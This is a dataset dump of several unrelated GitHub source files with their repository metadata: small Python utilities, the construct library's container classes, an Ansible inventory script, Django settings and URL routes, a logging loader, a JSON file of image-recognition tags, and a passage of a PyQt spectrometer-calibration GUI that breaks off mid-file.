blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bb29d3646af959dd01b308da7b489742cb1bc25e | 419eee7672547fc178aaaa98614ab00c4c5d2303 | /Code Library/63.Smallest_Power_of_2_Greater_than_or_Equal_to_n.py | c4556558dcd5b2c826cff43d0c9ecd1ffc90939d | [] | no_license | PratikshaDanti/APS | 35fdc382bda3548c88b73ae8a72fffc37c0a0d8e | cbb3ac41f08394d95978211e73621689d13d9e1f | refs/heads/master | 2022-04-19T00:34:52.929430 | 2020-04-06T13:55:09 | 2020-04-06T13:55:09 | 236,159,046 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 336 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 23 08:52:01 2020
@author: Pratiksha
"""
def nextPowerOf2(n):
count = 0;
if (n and not(n & (n - 1))):
return n
while( n != 0):
n >>= 1
count += 1
return 1 << count;
# Simple CLI driver: read one integer and print the next power of two.
n = int(input('Enter the value :'))
print(nextPowerOf2(n))
| [
"noreply@github.com"
] | noreply@github.com |
5709ce876b59bfb900914b67ff8695dfd1e01ca0 | 7548d980a4407477d06824a01a35b62c38f1a3b8 | /weeks7-8/prac4_Pacman/test.py | 44214c722b66cb21b0054e1e846543a8b641c299 | [] | no_license | xtaiba/11510056- | 8156b801759f5d0c5f6b8b1815bad50002ee3baa | 3656016525127eb1724c7ac03379d05d2a1c326f | refs/heads/master | 2020-04-03T21:42:39.473037 | 2019-01-05T09:57:12 | 2019-01-05T09:57:12 | 155,579,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 41 | py | list = list(range(0.1,1,0.1))
print(list) | [
"11510056@mail.sustc.edu.cn"
] | 11510056@mail.sustc.edu.cn |
e0911a368b2851513e0a25e2d9532c21656f1e73 | f3a2bcb503eff16f58bfbb173ad9df1ba93d76f2 | /construct/lib/container.py | ba6849fcab586342cfee67a03ae24fac6b802ca3 | [] | no_license | Selfnet/self-control-server | a0e3a26da28a995da262afdc82d887fc4901e443 | dd0e9a072c73a106c1db89b751f377ea29d7a5ba | refs/heads/master | 2021-01-10T15:35:53.919816 | 2013-07-22T22:07:55 | 2013-07-22T22:07:55 | 8,586,071 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,702 | py | """
Various containers.
"""
# Compatibility shim: on modern Pythons MutableMapping is importable from
# collections; on very old Pythons without it, fall back to a
# UserDict-based stand-in whose `data` attribute aliases the instance
# __dict__ (the same storage convention Container uses below).
try:
 from collections import MutableMapping
except ImportError:
 from UserDict import UserDict
 class MutableMapping(UserDict):
  # UserDict expects `self.data`; alias it to the instance __dict__.
  data = property(lambda self: self.__dict__)
def recursion_lock(retval, lock_name = "__recursion_lock__"):
    """Decorator factory guarding a method against infinite recursion.

    While a decorated method executes, a boolean flag named *lock_name*
    is set on the instance; re-entrant calls on the same instance see
    the flag and immediately return *retval* instead of recursing
    (used by the containers' __pretty_str__ to print cyclic structures).
    """
    from functools import wraps  # local import keeps module-level deps unchanged

    def decorator(func):
        # The original copied only __name__; wraps also preserves
        # __doc__, __module__, __qualname__, etc.
        @wraps(func)
        def wrapper(self, *args, **kw):
            if getattr(self, lock_name, False):
                # Already inside this call on this instance: break the cycle.
                return retval
            setattr(self, lock_name, True)
            try:
                return func(self, *args, **kw)
            finally:
                # Always release the lock, even if func raised.
                setattr(self, lock_name, False)
        return wrapper
    return decorator
class Container(MutableMapping):
 """
 A generic container of attributes.
 Containers are the common way to express parsed data.

 All entries are stored directly in the instance __dict__, so attribute
 access (c.foo) and item access (c["foo"]) see the same data.
 """
 def __init__(self, **kw):
  # The keyword dict itself becomes the attribute storage.
  self.__dict__ = kw
 # The core dictionary interface.
 def __getitem__(self, name):
  return self.__dict__[name]
 def __delitem__(self, name):
  del self.__dict__[name]
 def __setitem__(self, name, value):
  self.__dict__[name] = value
 def keys(self):
  return self.__dict__.keys()
 def __len__(self):
  return len(self.__dict__.keys())
 # Extended dictionary interface.
 def update(self, other):
  self.__dict__.update(other)
 __update__ = update
 def __contains__(self, value):
  # Membership tests keys, mirroring dict semantics.
  return value in self.__dict__
 # Rich comparisons.
 def __eq__(self, other):
  # Equal when the attribute dicts are equal; objects without a
  # __dict__ never compare equal.
  try:
   return self.__dict__ == other.__dict__
  except AttributeError:
   return False
 def __ne__(self, other):
  return not self == other
 # Copy interface.
 def copy(self):
  # Shallow copy: the attribute dict is copied, values are shared.
  return self.__class__(**self.__dict__)
 __copy__ = copy
 # Iterator interface.
 def __iter__(self):
  return iter(self.__dict__)
 def __repr__(self):
  return "%s(%s)" % (self.__class__.__name__, repr(self.__dict__))
 #def __str__(self):
 # return "%s(%s)" % (self.__class__.__name__, str(self.__dict__))
 def __str__(self):
  return self.__pretty_str__()
 @recursion_lock("<...>")
 def __pretty_str__(self, nesting = 1, indentation = "    "):
  # Render public attributes (no leading underscore) one per line,
  # recursing into values that know how to pretty-print themselves.
  # recursion_lock stores its flag in this same __dict__, which stops
  # self-referential containers from recursing forever; the flag name
  # starts with "_" so the filter below hides it from the listing.
  attrs = []
  ind = indentation * nesting
  for k, v in self.items():
   if not k.startswith("_"):
    text = [ind, k, " = "]
    if hasattr(v, "__pretty_str__"):
     text.append(v.__pretty_str__(nesting + 1, indentation))
    else:
     text.append(repr(v))
    attrs.append("".join(text))
  if not attrs:
   return "%s()" % (self.__class__.__name__,)
  attrs.insert(0, self.__class__.__name__ + ":")
  return "\n".join(attrs)
class FlagsContainer(Container):
    """
    A container providing pretty-printing for flags.
    Only set flags are displayed.
    """
    @recursion_lock("<...>")
    def __pretty_str__(self, nesting = 1, indentation = "    "):
        # Show only public flags (no leading underscore) that are truthy.
        pad = indentation * nesting
        shown = [pad + name for name in self.keys()
                 if not name.startswith("_") and self.__dict__[name]]
        if not shown:
            return "%s()" % (self.__class__.__name__,)
        return "\n".join([self.__class__.__name__ + ":"] + shown)
class ListContainer(list):
    """
    A container for lists.
    """
    __slots__ = ["__recursion_lock__"]
    def __str__(self):
        return self.__pretty_str__()
    @recursion_lock("[...]")
    def __pretty_str__(self, nesting = 1, indentation = "    "):
        if not self:
            return "[]"
        # Render each element on its own indented line, recursing into
        # elements that know how to pretty-print themselves.
        pad = indentation * nesting
        rendered = []
        for item in self:
            if hasattr(item, "__pretty_str__"):
                rendered.append(item.__pretty_str__(nesting + 1, indentation))
            else:
                rendered.append(repr(item))
        body = "".join("\n" + pad + text for text in rendered)
        return "[" + body + "\n" + indentation * (nesting - 1) + "]"
class LazyContainer(object):
    """Placeholder for a value parsed from the stream only when .value
    is first accessed (lazy parsing)."""

    __slots__ = ["subcon", "stream", "pos", "context", "_value"]
    def __init__(self, subcon, stream, pos, context):
        # Remember everything needed to parse later; NotImplemented
        # doubles as the "not read yet" sentinel.
        self._value = NotImplemented
        self.context = context
        self.pos = pos
        self.stream = stream
        self.subcon = subcon
    def __eq__(self, other):
        try:
            return self._value == other._value
        except AttributeError:
            # `other` has no _value attribute: never equal.
            return False
    def __ne__(self, other):
        return not (self == other)
    def __str__(self):
        return self.__pretty_str__()
    def __pretty_str__(self, nesting = 1, indentation = "    "):
        val = self._value
        if val is NotImplemented:
            body = "<unread>"
        elif hasattr(val, "__pretty_str__"):
            body = val.__pretty_str__(nesting, indentation)
        else:
            body = str(val)
        return "%s: %s" % (self.__class__.__name__, body)
    def read(self):
        # Seek to the recorded offset and parse the subconstruct there.
        self.stream.seek(self.pos)
        return self.subcon._parse(self.stream, self.context)
    def dispose(self):
        # Drop every reference so the stream/construct can be collected.
        for name in ("subcon", "stream", "context", "pos"):
            setattr(self, name, None)
    def _get_value(self):
        # Parse on first access, then cache.
        if self._value is NotImplemented:
            self._value = self.read()
        return self._value
    value = property(_get_value)
    has_value = property(lambda self: self._value is not NotImplemented)
#if __name__ == "__main__":
# c = Container(a = 5, b = 6)
# print c
| [
"kai-uwe@tafelrunde4.workstation.whnetz"
] | kai-uwe@tafelrunde4.workstation.whnetz |
d665d9272fcadbba28e19bae1cd2e2ba4d440a4b | dd63ac24f975649208233685218246a425c073ce | /ansible/dynamic_inventory/get_inventory.py | d6a98c953c766f3a294ecf996033a3079ec48e3b | [
"MIT"
] | permissive | joelwking/code-samples | 4f6824b3aafdaeaff6f98f09e01d1d71adc619f3 | 73f277221fc088c371e3fa33cbad1e16795018af | refs/heads/master | 2020-12-24T07:17:55.272299 | 2019-08-09T18:31:47 | 2019-08-09T18:31:47 | 59,486,376 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,805 | py | #!/usr/bin/env python
#
# get_inventory.py Sample program to create a dynamic inventory from a CSV file
#
# Usage: See the companion playbook get_invy.yml
#
# Copyright (c) 2016 World Wide Technology, Inc.
# All rights reserved.
#
# author: Joel W. King, World Wide Technology
#
# Reference: http://www.jeffgeerling.com/blog/creating-custom-dynamic-inventories-ansible
# Chapter 7 of Ansible for DevOps, a book on Ansible by Jeff Geerling.
#
#
import sys
import json
import csv
def main(csv_file="f5_create.csv"):
    """Create a dynamic Ansible inventory from a spreadsheet.

    csv_file -- path of the CSV file to read.  Defaults to the original
    hard-coded "f5_create.csv" so existing callers are unaffected.

    Returns a dict in Ansible dynamic-inventory format: the group lists
    its hosts, and the per-host variables (one per CSV column) live
    under "_meta"/"hostvars".
    """
    GROUP = "F5_CREATE"          # Name of the group referenced in the playbook
    HOSTNAME = "STUDENT_POD"     # Column header used as the inventory host name

    group_output = {
        GROUP: dict(hosts=[]),
        "_meta": {"hostvars": dict()}
    }
    #
    # Read the CSV and format
    #
    with open(csv_file) as csvfile:
        for row in csv.DictReader(csvfile):
            host = row[HOSTNAME]
            # Register the host in the group.
            group_output[GROUP]["hosts"].append(host)
            # Every spreadsheet column becomes a host variable.
            group_output["_meta"]["hostvars"][host] = dict(row)
    return group_output
if __name__ == '__main__':
    # Parenthesised print works under both Python 2 and Python 3;
    # the original bare `print json.dumps(...)` statement is a
    # SyntaxError on Python 3.
    print(json.dumps(main()))
| [
"joel.king@wwt.com"
] | joel.king@wwt.com |
4a1758e7ca32cd345aa0c5b376f92a5dc0a0b52f | 7996d7fefe2d3e5b4d53df4376d6fd8908407a1a | /authentication/urls.py | 139def747c67ed7664c5e93050e1419ada49d7e8 | [] | no_license | Imraj423/twitterclone | 2aa1446ef6e5dec6548f26c6254d478a696970ec | 0c3dfab5436de9095248305d3994dc77549e0b1e | refs/heads/master | 2021-01-15T02:07:06.684002 | 2020-04-04T23:47:39 | 2020-04-04T23:47:39 | 242,843,822 | 0 | 0 | null | 2020-03-07T04:02:21 | 2020-02-24T21:08:23 | Python | UTF-8 | Python | false | false | 229 | py | from django.urls import path
from . import views
# URL routes for the authentication app; each route's `name` is used for
# reverse lookups in templates and redirects.
urlpatterns = [
    path('signup/', views.signup, name='signup'),
    path('login/', views.login_view, name='login'),
    path('logout/', views.logoutUser, name='logout'),
]
| [
"dahqniss@gmail.com"
] | dahqniss@gmail.com |
79db5f1c36777c88d7fa3bc39575c57b377af1e3 | 81d2815060bdf51e59f40366df72954ad28b2398 | /4th_hw/fourth_homework/settings.py | fd3cb961f456cae77e2fd2c6099a1d6763910875 | [] | no_license | ningpop/LikeLion_7th_HW | 6016604427e335250f2e3daeec27f17731612b47 | b2c65a0b7a9a928a45cf07b67cd9ed18fb86d799 | refs/heads/master | 2020-06-30T18:08:54.024617 | 2019-12-30T16:17:03 | 2019-12-30T16:17:03 | 200,902,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,613 | py | """
Django settings for fourth_homework project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import dj_database_url

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# Read from the environment; None (unset) makes Django refuse to start,
# so SECRET_KEY must be defined in the deployment environment.
SECRET_KEY = os.environ.get('SECRET_KEY')

# SECURITY WARNING: don't run with debug turned on in production!
# NOTE(review): bool() of any non-empty string is True, so even
# DJANGO_DEBUG="0" or "False" enables debug mode -- only the unset
# case yields False.
DEBUG = bool( os.environ.get('DJANGO_DEBUG', False))

# Accept any Host header (fine for a demo deployment, unsafe otherwise).
ALLOWED_HOSTS = ['*']

# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # Project apps.
    'learning.apps.LearningConfig',
    'accounts.apps.AccountsConfig',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    # WhiteNoise serves collected static files in production.
    'whitenoise.middleware.WhiteNoiseMiddleware',
]

ROOT_URLCONF = 'fourth_homework.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': ['fourth_homework/templates'],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'fourth_homework.wsgi.application'

# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
# Local default is SQLite; overridden from DATABASE_URL further below.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/

LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/

# STATIC_URL was assigned twice with the same value; defined once here.
STATIC_URL = '/static/'
STATICFILES_DIRS = [
    os.path.join(BASE_DIR, 'learning', 'static')
]
STATIC_ROOT = os.path.join(BASE_DIR, 'static')  # target of `collectstatic`

# User-uploaded files.
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'

# On Heroku-style deployments, replace the SQLite default with the
# database described by the DATABASE_URL environment variable.
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
"craft1933@naver.com"
] | craft1933@naver.com |
b3a946c7a77d0937013abc5cb13bd52aa0f0c0c6 | 6e11824b4a32049ce7df94b9edb42b1cb3cba68b | /src/gamelog.py | 3748590046b4de0eda8b7bb8d650d5597c814974 | [] | no_license | TickTockTech/pynheart | ce2f3ed39a30b1761e083541c5182c1032505845 | ac12d6678a49505479d4ce2303f2ff774cb7dfc1 | refs/heads/master | 2020-04-04T13:59:24.485552 | 2018-11-03T21:02:30 | 2018-11-03T21:02:30 | 155,982,374 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 219 | py | import os
import logging
import logging.config

# Locate log.cfg next to this module so logging is configured correctly
# regardless of the current working directory.
log_config = os.path.abspath(os.path.join(os.path.dirname(__file__), "log.cfg"))
logging.config.fileConfig(log_config)

# create logger (module-wide; other modules use the 'gameLog' logger)
Log = logging.getLogger('gameLog')
| [
"allan@yisup.net"
] | allan@yisup.net |
644c6fd5abc3bfb9a657f9548487452187e4659e | 0b96015603d709b37dbd522ebae0a3b367e8e82f | /Tags/legs/167.png.py | 965b2bb29fe6b45fd6bed060acce93a1a65d1820 | [] | no_license | AWilcke/ClariFight | ccbbfec08192b029ce13ed11fc6967550ede74ce | d1689025c5087c70f2c33ad80d8417b45b4ebd01 | refs/heads/master | 2021-01-11T11:17:27.446503 | 2016-03-10T19:32:00 | 2016-03-10T19:32:00 | 53,609,870 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 557 | py | {"body": "0.779967069626", "recreation": "0.823184847832", "fashion": "0.938068032265", "barefoot": "0.810911774635", "adult": "0.984340786934", "people": "0.976011514664", "nude": "0.901487231255", "nobody": "0.945029020309", "underwear": "0.758705735207", "one": "0.970272898674", "feet": "0.936763525009", "erotic": "0.902205824852", "footwear": "0.955862760544", "skin": "0.834527671337", "medicine": "0.865551114082", "sexy": "0.987516820431", "model": "0.923303186893", "clothing": "0.81817150116", "girl": "0.801391482353", "women": "0.974669098854"} | [
"arthur.wilcke@gmail.com"
] | arthur.wilcke@gmail.com |
54439c245d7fae5f35ec6680b74a2d298e21bec7 | 38422c3edeb269926502fed31a0761aff8dd3d3b | /Zeiss_spectrometer/Zeiss_spectrometer_Python3_v191002/Calib_Zeiss_spectrometer_GUI_v5.py | a35fdd8d0e04f888df7c292ff847d4857b865b8a | [] | no_license | vfurtula/Alle-projekter | 2dab3ccbf7ddb6be3ee09f9f5e87085f354dd84a | da3d7c9611088043e2aea5d844f1ae6056215e04 | refs/heads/master | 2022-06-07T05:17:35.327228 | 2020-04-30T10:28:48 | 2020-04-30T10:28:48 | 260,180,957 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 47,654 | py | import os, sys, imp, serial, time, numpy
import scipy.interpolate
#from numpy.polynomial import polynomial as P
import pyqtgraph as pg
from pyqtgraph.Qt import QtCore, QtGui
import pyqtgraph.exporters
#from PyQt4 import QtGui, QtCore
from PyQt4.QtCore import QThread, QTimer, SIGNAL
import config_zeiss, ZaberXmcb_ascii
class zaber_Thread(QThread):
 """Worker thread driving one Zaber stepper axis of the Zeiss
 spectrometer (wavelength drum or slit) and reporting results to the
 GUI via old-style PyQt signals ('more_tals' / 'bad_zaber_val').

 `sender` is the label of the GUI button that triggered the action and
 selects the branch executed in run().
 """
 def __init__(self, sender, Za, adjust_mode, calib_file, *argv):
  # Za: ZaberXmcb_ascii controller wrapper.
  # adjust_mode: "wavelength" or "slit"; selects which axis is driven.
  # calib_file: two-column text file mapping microsteps <-> physical value.
  QThread.__init__(self)
  self.end_flag=False
  self.sender=sender
  self.Za=Za
  self.calib_mode=adjust_mode
  self.calib_file=calib_file
  # Axis 1 drives the wavelength drum, axis 2 the slit.
  if self.calib_mode=="wavelength":
   self.axs=1
  elif self.calib_mode=="slit":
   self.axs=2
  # Optional extra argument: the move target (microsteps, nm or mm
  # depending on the sender string).
  if argv:
   self.move_num=argv[0]
 def __del__(self):
  # Block until the thread has finished before tearing the object down.
  self.wait()
 def abort_move(self):
  """Stop the current move on this axis and flag the thread to end."""
  self.Za.set_Stop(1,self.axs)
  self.end_flag=True
 def return_pos_if_stopped(self):
  """Return the axis' microstep position once it has stopped moving."""
  return self.Za.return_Position_When_Stopped(1,self.axs)
 def update(self):
  """Read back the stopped position, persist it in config_zeiss.py and
  notify the GUI with the (position, physical value) pair."""
  min_pos=self.return_pos_if_stopped()
  # NOTE(review): the wrapper appears to return the exception *class*
  # (serial.SerialException or ValueError) on failure -- confirm in
  # ZaberXmcb_ascii before relying on this convention.
  if min_pos in [serial.SerialException, ValueError]:
   self.emit(SIGNAL('bad_zaber_val(PyQt_PyObject)'),min_pos)
   return
  pos_val=self.get_zeiss_value(min_pos)
  # Persist the last known position; line index 4/5 is zero-based,
  # i.e. the 5th/6th line of config_zeiss.py.
  if self.calib_mode=="wavelength":
   self.replace_line("config_zeiss.py",4,''.join(["Last_position_lambda=[",str(min_pos),",",str(pos_val),"]\n"]))
  elif self.calib_mode=="slit":
   self.replace_line("config_zeiss.py",5,''.join(["Last_position_slit=[",str(min_pos),",",str(pos_val),"]\n"]))
  imp.reload(config_zeiss)
  # Ad-hoc record object carrying the new position to the GUI thread.
  more_tals_obj=type('more_tals_obj',(object,),{'min_pos':min_pos, 'pos_val':pos_val})
  self.emit(SIGNAL('more_tals(PyQt_PyObject)'), more_tals_obj)
 def replace_line(self,file_name, line_num, text):
  """Overwrite a single (zero-based) line of *file_name* with *text*."""
  lines = open(file_name, 'r').readlines()
  lines[line_num] = text
  out = open(file_name, 'w')
  out.writelines(lines)
  out.close()
 def run(self):
  """Dispatch on the triggering button label and execute the move."""
  if self.sender==u'\u25b2':
   # Jog up: +10 microsteps.
   check=self.Za.move_Relative(1,self.axs,10)
   if check in [serial.SerialException, ValueError]:
    self.emit(SIGNAL('bad_zaber_val(PyQt_PyObject)'),check)
    return
   self.update()
  elif self.sender==u'\u25bc':
   # Jog down: -10 microsteps.
   check=self.Za.move_Relative(1,self.axs,-10)
   if check in [serial.SerialException, ValueError]:
    self.emit(SIGNAL('bad_zaber_val(PyQt_PyObject)'),check)
    return
   self.update()
  elif self.sender=='Move rel':
   # Relative move by move_num microsteps.
   check=self.Za.move_Relative(1,self.axs,self.move_num)
   if check in [serial.SerialException, ValueError]:
    self.emit(SIGNAL('bad_zaber_val(PyQt_PyObject)'),check)
    return
   self.update()
  elif self.sender=='Move abs':
   # Absolute move to move_num microsteps.
   check=self.Za.move_Absolute(1,self.axs,self.move_num)
   if check in [serial.SerialException, ValueError]:
    self.emit(SIGNAL('bad_zaber_val(PyQt_PyObject)'),check)
    return
   self.update()
  elif 'Move to' in self.sender or 'Adjust' in self.sender:
   # Target given in physical units (nm or mm); convert via calibration.
   position=self.get_pos(self.move_num)
   check=self.Za.move_Absolute(1,self.axs,position)
   if check in [serial.SerialException, ValueError]:
    self.emit(SIGNAL('bad_zaber_val(PyQt_PyObject)'),check)
    return
   self.update()
  elif self.sender=='-> nm':
   # Re-zero: declare the current mechanical position to equal
   # move_num nanometres and persist it.
   min_pos=self.get_pos(self.move_num)
   check=self.Za.set_Current_Position(1,self.axs,min_pos)
   if check in [serial.SerialException, ValueError]:
    self.emit(SIGNAL('bad_zaber_val(PyQt_PyObject)'),check)
    return
   more_tals_obj=type('more_tals_obj',(object,),{'min_pos':min_pos, 'pos_val':self.move_num})
   self.emit(SIGNAL('more_tals(PyQt_PyObject)'), more_tals_obj)
   self.replace_line("config_zeiss.py",4,''.join(["Last_position_lambda=[",str(min_pos),",",str(self.move_num),"]\n"]))
   imp.reload(config_zeiss)
  elif self.sender=='-> mm':
   # Same re-zeroing for the slit axis, in millimetres.
   min_pos=self.get_pos(self.move_num)
   check=self.Za.set_Current_Position(1,self.axs,min_pos)
   # NOTE(review): this branch tests min_pos while '-> nm' tests check;
   # `check` was probably intended here as well -- verify.
   if min_pos in [serial.SerialException, ValueError]:
    self.emit(SIGNAL('bad_zaber_val(PyQt_PyObject)'),min_pos)
    return
   more_tals_obj=type('more_tals_obj',(object,),{'min_pos':min_pos, 'pos_val':self.move_num})
   self.emit(SIGNAL('more_tals(PyQt_PyObject)'), more_tals_obj)
   self.replace_line("config_zeiss.py",5,''.join(["Last_position_slit=[",str(min_pos),",",str(self.move_num),"]\n"]))
   imp.reload(config_zeiss)
  else:
   # Unknown sender label: nothing to do.
   pass
 def get_pos(self,nm):
  """Map physical values (nm or mm, scalar or array) to microstep
  positions via a cubic spline through the calibration file.

  Returns rounded integer position(s); returns None (implicitly) when
  *nm* lies outside the calibrated range.
  """
  x=[]
  y=[]
  with open(self.calib_file, 'r') as thefile:
   for line in thefile:
    columns = line.split()
    x.extend([int(columns[0])]) #microstep pos.
    if self.calib_mode=="wavelength":
     y.extend([round(float(columns[1]),1)]) #wavelength
    elif self.calib_mode=="slit":
     y.extend([round(float(columns[1]),2)]) #slit
  if numpy.min(nm)>=min(y) and numpy.max(nm)<=max(y):
   #spline
   pos_curve=scipy.interpolate.splrep(y, x, k=3, s=0)
   #linear
   #wv_curve = scipy.interpolate.splrep(x, y, k=1, s=0)
   pos_pos = scipy.interpolate.splev(nm, pos_curve, der=0)
   nums=numpy.rint(pos_pos) # round the up/down floats
   return nums.astype(int)
 def get_zeiss_value(self,pos):
  """Inverse of get_pos: map microstep position(s) to physical values.

  Returns values rounded to 0.1 (wavelength, nm) or 0.01 (slit, mm);
  returns None (implicitly) when *pos* is outside the calibrated range.
  """
  x=[]
  y=[]
  with open(self.calib_file, 'r') as thefile:
   for line in thefile:
    columns = line.split()
    x.extend([int(columns[0])]) #microstep pos.
    if self.calib_mode=="wavelength":
     y.extend([round(float(columns[1]),1)]) #wavelength
    elif self.calib_mode=="slit":
     y.extend([round(float(columns[1]),2)]) #slit
  if numpy.min(pos)>=min(x) and numpy.max(pos)<=max(x):
   #spline
   wv_curve=scipy.interpolate.splrep(x, y, k=3, s=0)
   #linear
   #wv_curve = scipy.interpolate.splrep(x, y, k=1, s=0)
   pos = scipy.interpolate.splev(pos, wv_curve, der=0)
   if self.calib_mode=="wavelength":
    return numpy.round(pos,1)
   elif self.calib_mode=="slit":
    return numpy.round(pos,2)
class Run_gui(QtGui.QDialog):
def __init__(self, MyBar, parent=None):
QtGui.QDialog.__init__(self, parent)
#super(Run_gui, self).__init__()
#####################################################
# constants
self.Validrange_lambda = config_zeiss.Validrange_lambda
self.Validrange_slit = config_zeiss.Validrange_slit
self.Range_lambda = config_zeiss.Range_lambda
self.Range_slit = config_zeiss.Range_slit
self.calibfile_lambda_str = config_zeiss.calibfile_lambda
self.calibfile_slit_str = config_zeiss.calibfile_slit
self.lambda_str=config_zeiss.lambdafile
self.slit_str=config_zeiss.slitfile
self.timestr = config_zeiss.timestr
self.filename_str = config_zeiss.filename
self.folder_str = config_zeiss.foldername
self.zaberport_str = config_zeiss.zaberport
self.sr510port_str = config_zeiss.sr510port
self.all_pos=[config_zeiss.Last_position_lambda[0]]
self.MyBar=MyBar
self.initUI()
def initUI(self):
self.infoCalibButton = QtGui.QPushButton('Calib files info',self)
################### MENU BARS START ##################
#MyBar = QtGui.QMenuBar(self)
fileMenu = self.MyBar.addMenu("File")
fileSavePlt = fileMenu.addAction("Save calib plot")
fileSavePlt.triggered.connect(self.set_save_plots)
fileSavePlt.setShortcut('Ctrl+P')
fileSaveSet = fileMenu.addAction("Save settings")
fileSaveSet.triggered.connect(self.set_save) # triggers closeEvent()
fileSaveSet.setShortcut('Ctrl+S')
fileClose = fileMenu.addAction("Close")
fileClose.triggered.connect(self.close) # triggers closeEvent()
fileClose.setShortcut('Ctrl+X')
modeMenu = self.MyBar.addMenu("Mode")
self.conMode = modeMenu.addAction("Connect to serial")
self.conMode.triggered.connect(self.set_connect)
self.disconMode = modeMenu.addAction("Disconnect from serial")
self.disconMode.triggered.connect(self.set_disconnect)
serialMenu = self.MyBar.addMenu("Serial")
self.serialZaber = serialMenu.addAction("Zaber stepper")
self.serialZaber.triggered.connect(self.ZaberDialog)
calibMenu = self.MyBar.addMenu("Calib")
self.calibWaveZeiss = calibMenu.addAction("Load ref lambda calib file")
self.waveZeiss = calibMenu.addAction("Load wavelength file")
self.waveZeiss.setShortcut('Ctrl+W')
self.calibWaveZeiss.triggered.connect(self.loadCalibLambdaDialog)
self.waveZeiss.triggered.connect(self.loadWaveDialog)
self.calibSlitZeiss = calibMenu.addAction("Load ref slit calib file")
self.slitZeiss = calibMenu.addAction("Load slit width file")
self.slitZeiss.setShortcut('Ctrl+Q')
self.calibSlitZeiss.triggered.connect(self.loadCalibSlitDialog)
self.slitZeiss.triggered.connect(self.loadSlitDialog)
################### MENU BARS END ##################
lb3 = QtGui.QLabel("CALIBRATE:",self)
lb3.setStyleSheet("color: blue")
self.cb3 = QtGui.QComboBox(self)
mylist3=["wavelength","slit"]
self.cb3.addItems(mylist3)
self.cb3.setCurrentIndex(mylist3.index("wavelength"))
#self.cb3.setEnabled(True)
##############################################
filename = QtGui.QLabel("File name",self)
foldername = QtGui.QLabel("Folder name",self)
self.filenameEdit = QtGui.QLineEdit(self.filename_str,self)
self.folderEdit = QtGui.QLineEdit(self.folder_str,self)
##############################################
# status info which button has been pressed
self.motorstep_lbl = QtGui.QLabel("ZABER stepper postion:", self)
self.motorstep_lbl.setStyleSheet("color: blue")
self.upButton = QtGui.QPushButton(u'\u25b2',self)
self.set_bstyle_v1(self.upButton)
self.downButton = QtGui.QPushButton(u'\u25bc',self)
self.set_bstyle_v1(self.downButton)
self.moverelButton = QtGui.QPushButton('Move rel',self)
self.moveabsButton = QtGui.QPushButton('Move abs',self)
#self.moveabsButton.setStyleSheet('QPushButton {color: red}')
self.moverelEdit = QtGui.QLineEdit(str(100),self)
